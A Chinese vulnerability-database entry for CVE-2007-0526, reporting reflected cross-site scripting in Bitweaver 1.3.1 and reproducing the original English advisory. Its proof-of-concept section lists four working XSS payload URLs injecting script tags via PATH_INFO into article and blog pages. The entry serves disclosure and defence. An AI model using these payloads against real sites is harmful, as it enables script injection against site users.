Bitweaver 多个跨站攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191956 漏洞类型 跨站脚本
发布时间 2007-01-25 更新时间 2007-01-25
CVE编号 CVE-2007-0526 CNNVD-ID CNNVD-200701-455
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81976
https://cxsecurity.com/issue/WLB-2007010101
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-455
|漏洞详情
Bitweaver1.3.1版本中存在多个跨站攻击漏洞。远程攻击者可以借助提交到(1)articles/edit.php,(2)articles/list.php,(3)blogs/list_blogs.php或(4)blogs/rankings.php的URL(PATH_INFO),注入任意的web脚本或HTML。
|漏洞EXP
-=[--------------------ADVISORY-------------------]=-
                                              
                        bitweaver 1.3.1     
                                               
  Author: CorryL    [corryl80 (at) gmail (dot) com [email concealed]]   
-=[-----------------------------------------------]=-

-=[+] Application:    bitweaver
-=[+] Version:        1.3.1
-=[+] Vendor's URL:   http://www.bitweaver.org/articles/
-=[+] Platform:       WindowsLinuxUnix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

Bitweaver is an advanced, Open Source, Object Oriented, 
Content Management System (CMS) and Web Application Framework written in PHP. 
It uses Smarty Templates for a simple HTML based templating system and ADOdb 
to support a multitude of databases including MySQL, 
PostgreSQL and Firebird. It's strength lies in it's highly modular and easily extensible design. 
This high degree of flexibility is considered "large grained modularity" and gives 
developers freedom to interleave open-source and proprietary code seamlessly. 
bitweaver has been designed from the very beginning, for speed from end-to-end: 
schema design, query utilization, and software design - a highly tuned, performance engine. 
The use of standard compliant XHTML Strict 1.0 and sophisticated tableless 
CSS has made bitweaver stand above the rest in the web application world. The well organized, 
nested style class system gives you substantial freedom with CSS based styling, 
with the least amount of work. With bitweaver, you are in control. 
bitweaver goes out of its way to let you make the decisions and design 
choices that best suit your problem.

..::[ Proof Of Concept ]::..

http://remote-server/articles/edit.php/>"><ScRiPt>alert(907810260)%3B</S
cRiPt>
http://remote-server/articles/list.php/>"><ScRiPt>alert(907810260)%3B</S
cRiPt>
http://remote-server/blogs/list_blogs.php/>"><ScRiPt>alert(907810260)%3B
</ScRiPt>
http://remote-server/blogs/rankings.php/>"><ScRiPt>alert(907810260)%3B</
ScRiPt>
|受影响的产品
Bitweaver Bitweaver 1.3.1
|参考资料

来源:XF
名称:bitweaver-multiple-scripts-xss(31655)
链接:http://xforce.iss.net/xforce/xfdb/31655
来源:BUGTRAQ
名称:20070122[x0n3-h4ck]bitweaver1.3.1XSSExploit
链接:http://www.securityfocus.com/archive/1/archive/1/457695/100/0/threaded
来源:OSVDB
名称:33581
链接:http://osvdb.org/33581
来源:OSVDB
名称:33580
链接:http://osvdb.org/33580
来源:OSVDB
名称:33579
链接:http://osvdb.org/33579
来源:OSVDB
名称:33578
链接:http://osvdb.org/33578
来源:SREASON
名称:2186
链接:http://securityreason.com/securityalert/2186